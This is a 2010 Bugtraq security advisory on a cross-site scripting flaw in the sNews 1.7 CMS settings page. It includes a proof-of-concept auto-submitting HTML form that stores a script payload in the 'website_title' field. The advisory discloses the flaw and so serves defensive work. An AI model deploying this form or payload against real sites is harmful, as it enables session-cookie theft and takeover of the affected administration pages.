[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS vulnerability in sNews

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS vulnerability in sNews
From: advisory@xxxxxxxxxxx
Date: Tue, 19 Oct 2010 23:20:28 +0200 (CEST)

Vulnerability ID: HTB22638
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_snews_1.html
Product: sNews
Vendor: sNews Team ( tp://www.snewscms.com/ ) 
Vulnerable Version: 1.7 and probably prior versions
Vendor Notification: 05 October 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "snews.php" script to properly 
sanitize user-supplied input in "website_title" variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

<form action="http://host/?action=process&task=save_settings"; method="post" 
name="main" >

<input type="hidden" name="website_title" value='sNews 
1.7"><script>alert(document.cookie)</script>'>
<input type="hidden" name="home_sef" value="home">
<input type="hidden" name="website_description" value="sNews CMS">
<input type="hidden" name="website_keywords" value="snews">
<input type="hidden" name="website_email" value="info@xxxxxxxxxxxx">
<input type="hidden" name="contact_subject" value="Contact Form">
<input type="hidden" name="language" value="EN">
<input type="hidden" name="charset" value="UTF-8">
<input type="hidden" name="date_format" value="d.m.Y.+H:i">
<input type="hidden" name="article_limit" value="3">
<input type="hidden" name="rss_limit" value="5">
<input type="hidden" name="display_page" value="0">
<input type="hidden" name="num_categories" value="on">
<input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html">
<input type="hidden" name="allowed_file" 
value="php,htm,html,txt,inc,css,js,swf">
<input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png">
<input type="hidden" name="comment_repost_timer" value="20">
<input type="hidden" name="comments_order" value="ASC">
<input type="hidden" name="comment_limit" value="30">
<input type="hidden" name="word_filter_file" value="">
<input type="hidden" name="word_filter_change" value="">
<input type="hidden" name="save" value="Save">

</form>
<script>
document.main.submit();
</script>

Prev by Date: SQL Injection in 4site CMS
Next by Date: XSS vulnerability in sNews
Previous by thread: SQL Injection in 4site CMS
Next by thread: XSS vulnerability in sNews
Index(es):
- Date
- Thread